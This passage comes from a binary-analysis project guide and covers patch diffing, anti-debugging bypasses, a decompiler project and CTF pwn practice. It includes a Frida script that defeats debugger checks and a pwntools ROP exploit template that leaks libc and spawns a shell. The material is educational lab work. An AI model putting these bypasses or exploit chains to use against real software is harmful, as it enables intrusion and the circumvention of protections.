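]
v2 = [
    "mov rsi, [rbp-0x10]",
    "mov rdi, [rbp-0x8]",
    "mov edx, 0x40",      # new: size limit loaded
    "call strncpy",       # changed: bounded copy
]

# Print a unified diff, just like diffing two source files:
for line in difflib.unified_diff(v1, v2, "v1", "v2", lineterm=""):
    print(line)
```

The `-call strcpy` / `+call strncpy` pair plus the added size load is precisely the patch signature you would then document.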

### The Interview Questions They'll Ask

1. **"Explain BinDiff vs Diaphora vs Ghidriff."** - BinDiff: IDA integration. Diaphora: open-source. Ghidriff: Ghidra integration.

2. **"How would you diff stripped binaries?"** - Use structural features: prologues, CFG structure, string refs, API calls.

3. **"Function shows 85% similarity. Same function or false positive?"** - Check callers/callees, strings, constants.

4. **"Describe graph isomorphism problem."** - NP-intermediate—use heuristics for practical performance.

5. **"How do compiler optimizations affect diffing?"** - Compensate with normalized sequences, semantic equivalence.

6. **"Walk through Patch Tuesday analysis."** - Download → diff → filter security patterns → reverse-engineer.

7. **"Identify an added bounds check?"** - New comparison + conditional jump creating diamond CFG.

8. **"Optimizing large binary diffs?"** - Filter functions, use exact hashes, parallelize.

9. **"Detecting use-after-free patches?"** - NULL checks after free, pointers set to NULL.

10. **"Build differ from scratch?"** - Disassembly → CFG → fingerprinting → matching → reporting.

### Books That Will Help

| Topic | Book | Chapters |
|-------|------|----------|
| **Binary Analysis** | "Practical Binary Analysis" by Dennis Andriesse | Ch 5-7 |
| **Control Flow** | "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron | Ch 3.6-3.7 |
| **Assembly** | "Low-Level Programming" by Igor Zhirkov | Ch 4-5 |
| **Vulnerabilities** | "Hacking: The Art of Exploitation" by Jon Erickson | Ch 0x300 |
| **Static Analysis** | "Practical Malware Analysis" by Sikorski & Honig | Ch 5-6 |

---

## Project 14: Anti-Debugging Bypass

- **File**: LEARN_BINARY_ANALYSIS.md
- **Main Programming Language**: Assembly, C, Python
- **Alternative Programming Languages**: Frida scripts
- **Coolness Level**: Level 4: Hardcore Tech Flex
- **Business Potential**: 1. The "Resume Gold"
- **Difficulty**: Level 3: Advanced
- **Knowledge Area**: Anti-Analysis / Evasion
- **Software or Tool**: x64dbg, GDB, Frida
- **Main Book**: "The Art of Mac Malware" by Patrick Wardle

**What you'll build**: Techniques to detect and bypass anti-debugging, anti-VM, and anti-analysis protections.

**Why it teaches binary analysis**: Real-world malware and protected software use these tricks. Knowing how to bypass them is essential.

**Core challenges you'll face**:
- **Detecting debuggers** → maps to *IsDebuggerPresent, ptrace, etc.*
- **Timing checks** → maps to *RDTSC, GetTickCount*
- **VM detection** → maps to *CPUID, registry checks*
- **Anti-disassembly** → maps to *opaque predicates, junk bytes*

**Resources for key challenges**:
- [Apriorit Anti-Debugging Techniques](https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software)
- [OpenRCE Anti-Reversing Database](https://www.openrce.org/reference_library/anti_reversing)
- [Infosec Anti-Analysis Techniques](https://resources.infosecinstitute.com/topic/anti-disassembly-anti-debugging-and-anti-vm/)

**Key Concepts**:
- **Windows Anti-Debugging**: NtQueryInformationProcess, PEB flags
- **Linux Anti-Debugging**: ptrace, /proc/self/status
- **Timing Attacks**: RDTSC, clock differences

**Difficulty**: Advanced
**Time estimate**: 2-3 weeks
**Prerequisites**: Projects 4-7, debugger proficiency

**Real world outcome**:

**Deliverables**:
- Analysis output or tooling scripts
- Report with control/data flow notes

**Validation checklist**:
- Parses sample binaries correctly
- Findings are reproducible in debugger
- No unsafe execution outside lab
```python
# Frida script to bypass anti-debugging

import frida

jscode = """
// Bypass IsDebuggerPresent
Interceptor.replace(
    Module.getExportByName('kernel32.dll', 'IsDebuggerPresent'),
    new NativeCallback(function() {
        console.log('[*] IsDebuggerPresent called - returning false');
        return 0;
    }, 'int', [])
);

// Bypass NtQueryInformationProcess (ProcessDebugPort)
Interceptor.attach(
    Module.getExportByName('ntdll.dll', 'NtQueryInformationProcess'),
    {
        onEnter: function(args) {
            this.processInfoClass = args[1].toInt32();
            this.buffer = args[2];
        },
        onLeave: function(retval) {
            if (this.processInfoClass === 7) {  // ProcessDebugPort
                console.log('[*] ProcessDebugPort check bypassed');
                this.buffer.writeU64(0);
            }
        }
    }
);

// Bypass timing checks by hooking GetTickCount
var originalGetTickCount = Module.getExportByName('kernel32.dll', 'GetTickCount');
var lastTick = 0;
Interceptor.replace(originalGetTickCount,
    new NativeCallback(function() {
        lastTick += 100;  // Always return consistent timing
        return lastTick;
    }, 'uint', [])
);

console.log('[*] Anti-debugging bypasses installed');
"""

device = frida.get_local_device()
pid = device.spawn(['./protected.exe'])
session = device.attach(pid)
script = session.create_script(jscode)
script.load()
device.resume(pid)
```

**Implementation Hints**:

Common anti-debugging techniques:

**Windows**:

```c
// Technique 1: IsDebuggerPresent
if (IsDebuggerPresent()) exit(1);

// Technique 2: PEB.BeingDebugged flag (x64: PEB pointer in GS:[0x60])
PPEB peb = (PPEB)__readgsqword(0x60);
if (peb->BeingDebugged) exit(1);

// Technique 3: NtQueryInformationProcess
DWORD debugPort;
NtQueryInformationProcess(GetCurrentProcess(),
    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);
if (debugPort != 0) exit(1);

// Technique 4: Timing check
DWORD start = GetTickCount();
// ... code ...
DWORD end = GetTickCount();
if (end - start > 100) exit(1);  // Too slow = debugger
```

**Linux**:

```c
// Technique 1: ptrace self-attach (fails if a debugger is already attached)
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) exit(1);

// Technique 2: Check /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
// Look for TracerPid: non-zero = debugged
```

Bypass approaches:

  1. Patch the check: NOP out the comparison
  2. Hook the API: Return false from IsDebuggerPresent
  3. Modify environment: Clear PEB flag
  4. Use stealth debugger: ScyllaHide, TitanHide
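The /proc/self/status technique can be reproduced from the analyst's side in a few lines of Python; TracerPid is the real field name, the rest is a sketch (Linux-only):

```python
def tracer_pid(status_path="/proc/self/status"):
    """Return the PID of the process tracing us, or 0 if none.
    This is exactly the field Linux anti-debug code greps for."""
    with open(status_path) as f:
        for line in f:
            if line.startswith("TracerPid:"):
                return int(line.split(":", 1)[1])
    raise RuntimeError("TracerPid field not found")

if __name__ == "__main__":
    pid = tracer_pid()
    if pid:
        print(f"[!] traced by PID {pid} - a protected binary would exit here")
    else:
        print("[*] no tracer detected")
```

Making the path a parameter hints at the bypass: hooking fopen (or LD_PRELOAD-ing a fake read) feeds the check a status file whose TracerPid is always 0.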

Learning milestones:

  1. Identify techniques → Recognize anti-debugging code
  2. Static bypass → Patch checks in binary
  3. Dynamic bypass → Use hooks/plugins
  4. Write bypasses → Create reusable scripts

The Core Question You’re Answering

“How do software protections detect analysis tools, and what techniques allow you to bypass these defenses without triggering detection?”

This project explores the cat-and-mouse game between analysts and software protection mechanisms. Malware, DRM systems, and commercial protections use anti-debugging, anti-VM, and anti-analysis techniques to prevent reverse engineering. Learning to bypass these protections is essential for malware analysis, vulnerability research, and understanding defensive evasion.

Concepts You Must Understand First

  1. Debugger Detection Mechanisms
    • Debuggers modify process state in detectable ways: PEB flags, debug registers, timing differences
    • Windows: IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess
    • Linux: ptrace syscall, /proc/self/status, parent PID checks

    Guiding Questions:

    • How does a debugger modify the Process Environment Block (PEB)?
    • Why can only one debugger attach to a process at a time using ptrace?
    • What happens to CPU timing when single-stepping through code?

    Book References:

    • “Practical Malware Analysis” by Sikorski & Honig - Ch 15: Anti-Disassembly and Anti-Debugging
    • “Hacking: The Art of Exploitation” by Jon Erickson - Ch 0x400: Debugging techniques
  2. Timing-Based Detection
    • RDTSC instruction reads CPU timestamp counter for precise timing measurements
    • Debuggers and analysis tools significantly slow execution
    • Detecting time deltas between instructions reveals analysis environments

    Guiding Questions:

    • How much slower is single-stepping compared to normal execution?
    • Can you reliably bypass RDTSC checks, and what are the techniques?
    • How do sandboxes and VMs affect timing measurements?

    Book References:

    • “Practical Malware Analysis” by Sikorski & Honig - Ch 15: Timing checks
    • “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron - Ch 9: Virtual Memory (understanding timing)
  3. Virtual Machine and Sandbox Detection
    • VMs have artifacts: CPUID brand strings, MAC address patterns, specific drivers
    • Sandboxes exhibit behavioral patterns: limited execution time, restricted network
    • Detection through registry keys, WMI queries, device enumeration

    Guiding Questions:

    • What CPUID values expose that you’re running in VMware or VirtualBox?
    • How do malware samples detect Cuckoo Sandbox specifically?
    • Can you make a VM completely undetectable, or is it fundamentally impossible?

    Book References:

    • “Practical Malware Analysis” by Sikorski & Honig - Ch 17: Anti-VM techniques
  4. Anti-Disassembly Techniques
    • Opaque predicates: jumps that always go one way but appear conditional
    • Junk bytes: instructions never executed but confuse disassemblers
    • Overlapping instructions: same bytes decoded multiple ways depending on entry point

    Guiding Questions:

    • How does an opaque predicate trick linear disassembly but not recursive?
    • What happens when you jump into the middle of a multi-byte instruction?
    • How do you recognize anti-disassembly patterns versus legitimate optimizations?

    Book References:

    • “Practical Malware Analysis” by Sikorski & Honig - Ch 15: Anti-Disassembly
  5. Bypass Strategies
    • Patching: NOP out detection code, modify conditional jumps
    • Hooking: Intercept API calls and return fake values (Frida, DLL injection)
    • Environment modification: Clear PEB flags, hide debugger presence
    • Stealth tools: ScyllaHide, TitanHide, custom debugger modifications

    Guiding Questions:

    • What’s the difference between static patching and dynamic hooking?
    • When is hooking superior to patching, and vice versa?
    • How do you hide from kernel-mode anti-debugging checks?

    Book References:

    • “The Art of Mac Malware” by Patrick Wardle - Ch on Anti-Analysis (techniques apply cross-platform)

Questions to Guide Your Design

  1. Which platform first? Focus on Windows (most anti-debug techniques) or Linux (simpler, ptrace-based)?

  2. Static or dynamic bypass? Patch the binary permanently or hook APIs at runtime?

  3. Tool selection? Build custom Frida scripts, use existing tools like ScyllaHide, or manually patch?

  4. How do you test your bypasses? Create your own protected binaries or use real-world samples?

  5. What’s your detection library? Catalog all known anti-debug techniques and their signatures?

  6. Automation strategy? Can you automatically detect and bypass common techniques?

  7. Handling kernel-mode protections? Many advanced protections run in kernel mode—do you need driver development skills?

  8. Documentation approach? How do you document bypass techniques for reuse?

Thinking Exercise

Manual anti-debug identification and bypass:

  1. Analyze this code snippet:
    if (IsDebuggerPresent()) {
        ExitProcess(1);
    }
    

    Compile it and:

    • Locate IsDebuggerPresent call in disassembly
    • Identify the conditional jump following the call
    • Method 1: NOP out the jump
    • Method 2: Hook IsDebuggerPresent to return 0
    • Method 3: Clear the BeingDebugged flag in the PEB
  2. RDTSC timing check:
    rdtsc
    mov ebx, eax
    ; ... some code ...
    rdtsc
    sub eax, ebx
    cmp eax, 0x1000  ; if too slow, debugger detected
    jl normal_execution
    
    • How would you bypass this statically (patching)?
    • How would you bypass this dynamically (hardware breakpoint on rdtsc)?
  3. Document your findings:
    • Technique: ___
    • Detection signature: ___
    • Bypass method 1: ___
    • Bypass method 2: ___
    • Pros/cons of each bypass: ___

The Interview Questions They’ll Ask

  1. “Explain how IsDebuggerPresent works internally.”
    • Checks BeingDebugged flag in PEB at offset 0x02. Bypass: clear the flag or hook the API.
  2. “What are PEB flags and how do they expose debuggers?”
    • PEB (Process Environment Block) contains NtGlobalFlag, BeingDebugged, hidden heap flags. Debuggers modify these.
  3. “Describe a timing-based anti-debugging technique.”
    • RDTSC before/after code section. If delta is too large, debugger detected. Bypass: hook rdtsc or use hardware breakpoints sparingly.
  4. “How would you bypass ptrace anti-debugging on Linux?”
    • ptrace can only attach once. Bypass: preload library that hooks ptrace to return success without actually attaching.
  5. “What’s the difference between ScyllaHide and manually patching?”
    • ScyllaHide dynamically hides debugger presence. Patching permanently modifies binary. ScyllaHide is reversible and works on unknown protections.
  6. “Explain opaque predicates and how they break disassemblers.”
    • Conditions that always evaluate one way but appear dynamic. Confuse linear sweep disassembly by inserting junk code in dead branch.
  7. “How do commercial packers detect debuggers?”
    • Multi-layered: API checks, PEB inspection, timing, exception-based detection, VM detection. Combine multiple signals for confidence.
  8. “Describe kernel-mode anti-debugging techniques.”
    • Direct kernel object inspection, debug port checking, handle enumeration. Bypass requires kernel driver or virtualization.
  9. “How would you build an anti-anti-debugging framework?”
    • Database of known techniques → automated detection → selective bypass based on technique type → testing harness.
  10. “What’s the ethical consideration when bypassing DRM?”
    • Legal gray area. Legitimate uses: security research, malware analysis. Illegal uses: piracy. DMCA Section 1201 prohibits circumvention in many cases.

Books That Will Help

| Topic | Book | Chapters |
|-------|------|----------|
| Anti-Debugging Techniques | “Practical Malware Analysis” by Sikorski & Honig | Ch 15-17 |
| Debugger Internals | “Hacking: The Art of Exploitation” by Jon Erickson | Ch 0x400 |
| Process Internals | “Windows Internals” by Russinovich & Solomon | Part 1, Ch 3: Processes |
| Binary Protection | “The Art of Mac Malware” by Patrick Wardle | Anti-Analysis chapters |
| System Architecture | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 8-9: Processes, Virtual Memory |
| Low-Level Details | “Low-Level Programming” by Igor Zhirkov | Ch 6: CPU and Memory |

Project 15: Build a Decompiler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: C++, Rust
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Program Analysis / Code Generation
  • Software or Tool: Your disassembler, LLVM (optional)
  • Main Book: “Compilers: Principles, Techniques, and Tools” (Dragon Book)

What you’ll build: A decompiler that converts assembly/IR back into readable C-like pseudocode.

Why it teaches binary analysis: Decompilation is the ultimate reverse engineering skill. Building one means understanding control flow, data flow, and type recovery.

Core challenges you’ll face:

  • Control flow recovery → maps to if/else, loops from jumps
  • Data flow analysis → maps to variable identification
  • Type inference → maps to int vs pointer vs struct
  • Code generation → maps to producing readable output

Resources for key challenges:

Key Concepts:

  • Control Flow Graphs: “Engineering a Compiler” Ch. 8
  • SSA Form: “Engineering a Compiler” Ch. 9
  • Type Recovery: Academic papers on type inference

Difficulty: Master
Time estimate: 2-3 months
Prerequisites: All previous projects, compiler theory

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

Input (disassembly):

```
push rbp
mov  rbp, rsp
sub  rsp, 0x20
mov  [rbp-0x14], edi     ; argc
mov  [rbp-0x20], rsi     ; argv
cmp  [rbp-0x14], 1
jle  .fail
mov  rax, [rbp-0x20]
mov  rdi, [rax+8]        ; argv[1]
call atoi
cmp  eax, 0x539          ; 1337
jne  .fail
lea  rdi, [success_msg]
call puts
jmp  .end
.fail:
lea  rdi, [fail_msg]
call puts
.end:
xor  eax, eax
leave
ret
```

Output (decompiled):

```c
int main(int argc, char **argv) {
    int input;

    if (argc <= 1) {
        puts("Wrong!");
        return 0;
    }

    input = atoi(argv[1]);

    if (input != 1337) {
        puts("Wrong!");
        return 0;
    }

    puts("Correct!");
    return 0;
}
```

Implementation Hints:

Decompilation phases:

  1. Disassembly: Convert bytes to instructions
  2. Control Flow Graph: Build graph of basic blocks
  3. Data Flow Analysis: Track value flow through registers
  4. Type Analysis: Infer types from usage
  5. Control Flow Structuring: Convert jumps to if/while
  6. Code Generation: Output C-like code

Control flow structuring algorithms:

  • If-then-else: Look for diamond patterns
  • While loops: Back edges in CFG
  • For loops: Canonical form with counter
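The “look for diamond patterns” rule can be checked mechanically on a CFG stored as an adjacency dict; the block names below are made up for illustration:

```python
def find_diamonds(cfg):
    """Yield (head, then_blk, else_blk, join) where head branches to two
    blocks that both fall through to the same join - the if/else shape."""
    for head, succs in cfg.items():
        if len(succs) == 2:
            a, b = succs
            sa, sb = cfg.get(a, []), cfg.get(b, [])
            if len(sa) == 1 and sa == sb:
                yield (head, a, b, sa[0])

# A cmp/jle in 'entry' picks .ok or .fail; both fall through to .end:
cfg = {
    "entry": ["ok", "fail"],
    "ok":    ["end"],
    "fail":  ["end"],
    "end":   [],
}
print(list(find_diamonds(cfg)))  # [('entry', 'ok', 'fail', 'end')]
```

A real structurer must also handle then-only diamonds (one successor jumps straight to the join) and nested patterns, but this is the core test.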

Questions to consider:

  • How do you detect loop vs if-else?
  • How do you recover variable names?
  • How do you handle optimized code?
  • How do you represent structs?

Start simple:

  1. Handle single-block functions
  2. Add if-else handling
  3. Add while loop detection
  4. Add function call recovery
  5. Add type inference

Learning milestones:

  1. Build CFG from assembly → Basic blocks and edges
  2. Detect if-else → Diamond pattern recognition
  3. Detect loops → Back edge identification
  4. Generate readable code → Produce C-like output

The Core Question You’re Answering

“How do you transform low-level assembly instructions back into high-level readable code, and what makes decompilation fundamentally harder than compilation?”

This project tackles one of the most challenging problems in reverse engineering: recovering source-like code from compiled binaries. Unlike disassembly (which just translates machine code to assembly), decompilation attempts to reconstruct higher-level abstractions like if/while statements, function calls, and even variable types. This is the technology behind IDA’s Hex-Rays and Ghidra’s decompiler.

Concepts You Must Understand First

  1. Control Flow Graph (CFG) Construction
    • CFG is a directed graph where nodes are basic blocks and edges represent jumps
    • Basic block: maximal sequence of instructions with single entry and single exit
    • CFG is the foundation for all decompilation—it represents program structure

    Guiding Questions:

    • How do you identify basic block boundaries from assembly?
    • What happens to the CFG when indirect jumps (jump tables) are present?
    • How do you handle overlapping code or self-modifying code?

    Book References:

    • “Engineering a Compiler” by Cooper & Torczon - Ch 8: Introduction to Optimization
    • “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron - Ch 3: Machine-Level Representation
  2. Static Single Assignment (SSA) Form
    • SSA: each variable assigned exactly once, making data flow explicit
    • Phi functions merge values at control flow join points
    • SSA simplifies many analyses: dead code elimination, constant propagation, type inference

    Guiding Questions:

    • Why is SSA form useful for decompilation?
    • How do you convert assembly to SSA form?
    • What are phi functions and when do you need them?

    Book References:

    • “Engineering a Compiler” by Cooper & Torczon - Ch 9: Data-Flow Analysis
  3. Control Flow Structuring
    • Converting arbitrary jumps into if/else, while, for, switch statements
    • Some CFGs cannot be perfectly structured (irreducible graphs)
    • Algorithms: interval analysis, structural analysis, the Phoenix algorithm

    Guiding Questions:

    • How do you recognize an if-then-else pattern in a CFG (diamond shape)?
    • How do you detect loops (back edges in the CFG)?
    • What do you do with goto-spaghetti that can’t be structured?

    Book References:

    • “Compilers: Principles, Techniques, and Tools” (Dragon Book) - Ch 9: Machine-Independent Optimizations
    • Research papers on control flow structuring algorithms
  4. Type Inference and Recovery
    • Assembly has no types—everything is bits and bytes
    • Type inference uses data flow, operations, and usage patterns
    • Challenge: distinguishing int from pointer from struct

    Guiding Questions:

    • If a value is dereferenced, what does that tell you about its type?
    • How do you recover struct layouts from memory access patterns?
    • Can you perfectly recover types, or is it fundamentally ambiguous?

    Book References:

    • Research papers on type inference in binary analysis
    • “Practical Binary Analysis” by Dennis Andriesse - Ch 7: Advanced Static Analysis
  5. Data Flow Analysis
    • Tracking how data moves through the program
    • Reaching definitions, live variables, available expressions
    • Used for variable name recovery and optimization

    Guiding Questions:

    • How do you identify that two register uses refer to the same logical variable?
    • What is def-use chain analysis?
    • How does data flow analysis help with decompilation quality?

    Book References:

    • “Engineering a Compiler” by Cooper & Torczon - Ch 9: Data-Flow Analysis
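Def-use chains, asked about above, fall out of a single forward pass over straight-line code: track the reaching definition of each variable and record every use before it is redefined. Illustrative sketch:

```python
# Build def-use chains over straight-line three-address code.
# Returns {(var, def_index): [use indices]}.
def def_use_chains(instructions):
    current_def = {}   # variable -> index of its reaching definition
    chains = {}
    for i, (dest, _op, args) in enumerate(instructions):
        for a in args:
            if a in current_def:
                chains.setdefault((a, current_def[a]), []).append(i)
        current_def[dest] = i          # this definition kills the old one
        chains.setdefault((dest, i), [])
    return chains

prog = [("a", "const", []),      # 0: a = ...
        ("b", "add", ["a"]),     # 1: b = a + ...   uses def 0
        ("a", "const", []),      # 2: a = ...       kills def 0
        ("c", "add", ["a"])]     # 3: c = a + ...   uses def 2
```

Two definitions of `a` with disjoint chains is exactly the evidence a decompiler uses to split one register into two logical variables.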
  6. Code Generation
    • Converting structured control flow and typed variables into readable C-like code
    • Pretty-printing, variable naming, comment generation
    • Balancing accuracy vs readability

    Guiding Questions:

    • How do you generate readable variable names when originals are lost?
    • Should you preserve all assembly details or simplify for readability?
    • How do you handle assembly idioms (e.g., xor eax, eax for zeroing)?

    Book References:

    • “Compilers: Principles, Techniques, and Tools” (Dragon Book) - Ch 8: Code Generation
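Idiom handling during code generation is often just a peephole table. A tiny sketch with a few common x86 idioms (the rules here are examples, not an exhaustive set):

```python
# Recognize assembly idioms and emit source-level intent instead of a
# literal translation; unknown instructions fall through unchanged.
IDIOMS = {
    ("xor", ("eax", "eax")): "eax = 0",                 # zeroing idiom
    ("test", ("eax", "eax")): "flags = (eax == 0)",     # zero test
    ("lea", ("eax", "[rdi+rdi*2]")): "eax = rdi * 3",   # multiply via lea
}

def simplify(mnemonic, operands):
    return IDIOMS.get((mnemonic, tuple(operands)),
                      f"{mnemonic} {', '.join(operands)}")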

Questions to Guide Your Design

  1. What IR (Intermediate Representation)? Use LLVM IR, custom IR, or work directly on assembly?

  2. How much do you simplify? Preserve every assembly detail or aggressively simplify to C-like code?

  3. Handling irreducible control flow? Use goto statements or try to restructure?

  4. Type system depth? Simple (int/pointer), or full (structs, arrays, function pointers)?

  5. Variable naming strategy? Generic (var1, var2) or heuristic-based (counter, buffer)?

  6. Testing approach? Compile simple C programs, decompile, compare with source?

  7. Performance vs accuracy? Fast but imperfect, or slow but highly accurate?

  8. Scope of support? Single functions or whole-program analysis with interprocedural optimization?

Thinking Exercise

Manual decompilation exercise:

  1. Given this assembly:
    push rbp
    mov  rbp, rsp
    sub  rsp, 16
    mov  DWORD PTR [rbp-4], 0    ; local var at rbp-4
    .L2:
    cmp  DWORD PTR [rbp-4], 9
    jg   .L3
    mov  eax, DWORD PTR [rbp-4]
    mov  edi, eax
    call print_number
    add  DWORD PTR [rbp-4], 1
    jmp  .L2
    .L3:
    leave
    ret
    
  2. Manual decompilation steps:
    • Identify basic blocks (entry, loop body, exit)
    • Draw the CFG (entry → loop → exit, with back edge)
    • Recognize the loop pattern (back edge: the jmp .L2 at the end of the body jumps back to the header .L2)
    • Identify loop counter ([rbp-4])
    • Translate to C:
      void function() {
          int i = 0;
          while (i <= 9) {
              print_number(i);
              i++;
          }
      }
      
  3. Document:
    • CFG: 3 blocks, 1 back edge
    • Loop type: while loop (could be for loop)
    • Variables: i (int, local at rbp-4)
    • Function calls: print_number(int)

The Interview Questions They’ll Ask

  1. “What’s the difference between disassembly and decompilation?”
    • Disassembly: machine code → assembly (1:1 mapping). Decompilation: assembly → high-level code (many:1, lossy).
  2. “Explain SSA form and why it’s used in decompilers.”
    • SSA: each variable assigned once. Simplifies data flow analysis, makes variable usage explicit, enables optimizations.
  3. “How do you detect a for loop vs while loop vs do-while in assembly?”
    • Pattern recognition in CFG: for has initialization, condition, increment. While: condition at start. Do-while: condition at end.
  4. “What makes control flow structuring hard?”
    • Irreducible graphs (can’t be structured without goto), optimizations create complex patterns, jump tables are indirect.
  5. “How would you infer that a variable is a pointer vs an integer?”
    • Pointer: dereferenced, used in lea, compared to addresses. Integer: used in arithmetic, compared to constants.
  6. “What’s a phi function in SSA form?”
    • Merges values from different control flow paths. Example: at loop header, phi(initial_value, updated_value).
  7. “Explain how you’d recover a struct from memory accesses.”
    • Group accesses by base pointer + offset. Offsets reveal field positions. Access types (byte/word/qword) reveal field sizes.
  8. “Why can’t decompilation be perfect?”
    • Information loss: variable names, comments, types, macros lost. Optimization obfuscates structure. Multiple source codes compile to same assembly.
  9. “How would you handle switch statements with jump tables?”
    • Detect: computed jump through table. Extract table from data section. Each entry is a case. Reconstruct switch statement.
  10. “Walk me through decompiling a simple function from scratch.”
    • Disassemble → build CFG → identify control structures → convert to SSA → type inference → code generation → pretty print.
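The struct-recovery answer (question 7) can be sketched directly: group memory accesses by base register, and let the offsets and access widths propose a field layout. Illustrative Python only; the size-to-type mapping is a simplifying assumption:

```python
# Infer a struct layout from observed accesses of the form
# (base_register, offset, access_size_in_bytes).
def recover_struct(accesses, base):
    size_to_type = {1: "char", 2: "short", 4: "int", 8: "long/ptr"}
    fields = {}
    for reg, offset, size in accesses:
        if reg == base:                      # only accesses off this base
            fields[offset] = size_to_type.get(size, f"bytes[{size}]")
    return [(off, fields[off]) for off in sorted(fields)]

# e.g. mov rax,[rdi]; mov eax,[rdi+8]; mov al,[rdi+12]
accesses = [("rdi", 0, 8), ("rdi", 8, 4), ("rsi", 0, 8), ("rdi", 12, 1)]
```

The gap between offsets 8 and 12 (4 bytes used, field at 12 is 1 byte) also hints at padding, which real tools use to refine field boundaries.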

Books That Will Help

| Topic | Book | Chapters |
| --- | --- | --- |
| Control Flow Analysis | “Engineering a Compiler” by Cooper & Torczon | Ch 8-9 |
| Compiler Fundamentals | “Compilers: Principles, Techniques, and Tools” (Dragon Book) | Ch 8-9 |
| Binary Analysis | “Practical Binary Analysis” by Dennis Andriesse | Ch 6-7 |
| Machine-Level Details | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3 |
| Assembly Language | “Low-Level Programming” by Igor Zhirkov | Ch 4-5 |
| Advanced Topics | Research papers on decompilation | “Native x86 Decompilation Using Semantics-Preserving Structural Analysis”; “No More Gotos: Decompilation Using Pattern-Independent Control-Flow Structuring” |

Project 16: CTF Binary Exploitation Practice

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Shell scripting
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: CTF / Competitive Hacking
  • Software or Tool: pwntools, Docker, CTF platforms
  • Main Book: “CTF Field Guide” (Trail of Bits)

What you’ll build: Solve 20+ CTF pwn challenges from various difficulty levels, building a personal exploit template library.

Why it teaches binary analysis: CTF challenges are designed to teach specific concepts. They provide immediate feedback and gamified learning.

Core challenges you’ll face:

  • Various vulnerability types → maps to stack, heap, format string
  • Different protections → maps to ASLR, NX, canary, PIE
  • Time pressure → maps to efficient analysis workflow
  • Novel techniques → maps to learning new tricks

Resources for key challenges:

Key Concepts:

  • Challenge Categories: CTF101.org
  • Exploit Primitives: “The Shellcoder’s Handbook”
  • Advanced Techniques: CTF writeups

Difficulty: Advanced
Time estimate: Ongoing (2+ months)
Prerequisites: Projects 7-8 (Buffer Overflow, ROP)

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```python
# Exploit template
from pwn import *

# Configuration
binary = './challenge'
libc_path = './libc.so.6' if args.REMOTE else '/lib/x86_64-linux-gnu/libc.so.6'
host, port = 'challenge.ctf.com', 1337

# Setup
elf = context.binary = ELF(binary)
libc = ELF(libc_path)

def conn():
    if args.REMOTE:
        return remote(host, port)
    elif args.GDB:
        return gdb.debug(binary, '''
            break main
            continue
        ''')
    else:
        return process(binary)

# Gadgets
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Exploit
def exploit():
    p = conn()

    # Stage 1: Leak libc
    payload = flat({
        0x48: pop_rdi,
        0x50: elf.got['puts'],
        0x58: elf.plt['puts'],
        0x60: elf.symbols['main']
    })

    p.sendlineafter(b'> ', payload)
    leak = u64(p.recvline().strip().ljust(8, b'\x00'))
    libc.address = leak - libc.symbols['puts']
    log.success(f'libc base: {hex(libc.address)}')

    # Stage 2: Shell
    payload = flat({
        0x48: ret,
        0x50: pop_rdi,
        0x58: next(libc.search(b'/bin/sh')),
        0x60: libc.symbols['system']
    })

    p.sendlineafter(b'> ', payload)
    p.interactive()

if __name__ == '__main__':
    exploit()
```


**Implementation Hints**:

Progression path:
1. **Stack challenges**: Buffer overflow, ret2win
2. **ROP challenges**: ret2libc, ROP chains
3. **Format string**: Read/write primitives
4. **Heap challenges**: Use-after-free, heap overflow
5. **Advanced**: House of Force, tcache poisoning

Build your template library:
- `leak_libc.py` - Standard libc leak pattern
- `rop_chain.py` - ROP chain builder
- `format_string.py` - Format string exploit
- `heap_exploit.py` - Heap exploitation patterns

Practice platforms:
- pwnable.kr (beginner-friendly)
- ROP Emporium (ROP-focused)
- pwnable.tw (advanced)
- picoCTF (beginner)

**Learning milestones**:
1. **Solve 10 stack challenges** → Master buffer overflows
2. **Solve 5 ROP challenges** → Bypass NX
3. **Solve 5 format string** → Arbitrary read/write
4. **Attempt heap challenges** → Enter advanced territory

### The Core Question You're Answering

**"How do you systematically discover and exploit vulnerabilities in compiled binaries, and why are CTF challenges the fastest way to master binary exploitation?"**

This project is about deliberate practice. CTF (Capture The Flag) pwn challenges are carefully designed to teach specific exploitation techniques in a safe, legal environment. Unlike real-world vulnerabilities (which are rare and unpredictable), CTF challenges provide concentrated, progressive skill-building opportunities. You'll develop the muscle memory and intuition that separates hobbyists from professional exploit developers.

### Concepts You Must Understand First

1. **Stack-Based Buffer Overflows**
   - The classic: writing past the end of a stack buffer to overwrite return addresses
   - Stack layout: local variables, saved frame pointer, return address, function arguments
   - Exploitation: overwrite return address to redirect execution

   *Guiding Questions:*
   - What's the exact memory layout of a stack frame on x86-64?
   - How much offset do you need to reach the return address?
   - What's the difference between x86 (32-bit) and x86-64 (64-bit) exploitation?

   *Book References:*
   - "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x300: Exploitation
   - "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron - Ch 3.7: Procedures (stack frame details)
